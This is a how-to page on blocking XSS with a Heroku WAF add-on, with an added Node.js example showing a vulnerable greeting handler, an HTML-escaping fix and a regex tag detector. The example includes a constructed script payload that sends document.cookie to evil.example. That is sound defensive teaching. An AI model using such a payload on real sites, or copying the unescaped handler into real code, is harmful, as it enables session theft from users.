How to Block HTML in forms (XSS) on Heroku
Why you might need this
Cross-Site Scripting (XSS) attacks are one of the most frequent types of attacks executed against web applications. Typically, malicious JavaScript is injected into an application through a form field or other input that the application reflects or stores without properly validating and encoding it.
Once injected, the script runs in victims' browsers with the privileges of your site, where it can steal session cookies and other data, perform actions on the user's behalf, or deliver malware and other damaging payloads.
Prerequisites
What you need to get started:
- The Expedited WAF add-on is set up in front of your application.
How To Stop XSS Attacks
On the Stop Attacks page of your Expedited WAF dashboard, select the Stop Suspected Attacks option.
Notes
- If you have forms on your site that legitimately accept HTML or JavaScript input (for example, a rich-text editor), you may need to exempt those URLs from checking. Keep exemptions as narrow as possible, and make sure the application itself sanitizes and encodes whatever those forms accept.
- Stopping suspected attacks is an additional layer of security for your site. It should work alongside solid development practices (output encoding and input validation), patching, and testing, not replace them.
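The following is an added example, not code from this page or from the Expedited WAF product. It shows, in plain Node.js, the application-side half of the picture that the notes above refer to: a form handler that reflects a field straight into HTML (the XSS sink), the same handler with output encoding applied, and a crude "does this look like HTML?" check of the kind a WAF rule performs, which stops the payload but also trips on harmless text such as `a <b> test`. The function names, the greeting template and the attacker payload are all constructed for illustration.

```javascript
// Added example (not from the page or the Expedited WAF product):
// reflected XSS sink, the output-encoded fix, and a naive HTML-blocking check.

// Constructed attacker input, the sort of thing a form field would carry.
const PAYLOAD =
  '<script>document.location="https://evil.example/?c="+document.cookie</script>';

// VULNERABLE: the submitted "name" is interpolated straight into HTML,
// so a browser rendering the response would execute the script tag.
function renderGreetingUnsafe(name) {
  return `<p>Hello, ${name}!</p>`;
}

// Encode the five characters that matter in HTML text and attribute
// context so user input can never break out of its text node.
// The ampersand must be handled first so entities we emit are not re-encoded.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// FIXED: same template, input encoded at the point of output.
function renderGreetingSafe(name) {
  return `<p>Hello, ${escapeHtml(name)}!</p>`;
}

// Crude "block HTML" check, similar in spirit to a WAF rule: reject any
// field containing something that parses as a tag (optional closing slash,
// a letter, then anything up to '>'). It catches PAYLOAD, lets "I <3 JavaScript"
// through, but also rejects legitimate text like "a <b> test", which is why
// forms that accept markup may need to be exempted from checking.
const TAG_RE = /<\s*\/?\s*[a-z][^>]*>/i;
function looksLikeHtml(s) {
  return TAG_RE.test(String(s));
}

// Demonstration on the constructed payload.
console.log('unsafe :', renderGreetingUnsafe(PAYLOAD));
console.log('safe   :', renderGreetingSafe(PAYLOAD));
console.log('blocked:', looksLikeHtml(PAYLOAD), looksLikeHtml('a <b> test'), looksLikeHtml('I <3 JavaScript'));
```

The WAF-style check and the output encoding fail in different ways: the regex is easy to bypass with inputs that are not well-formed tags yet still execute in some contexts, while `escapeHtml` is only correct for HTML text and attribute values, not for input dropped into a `<script>` block, a URL or a CSS context. That is the practical reason the notes say the WAF setting complements, rather than replaces, correct encoding in the application.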
Resources
More reading and framework-specific resources on preventing XSS attacks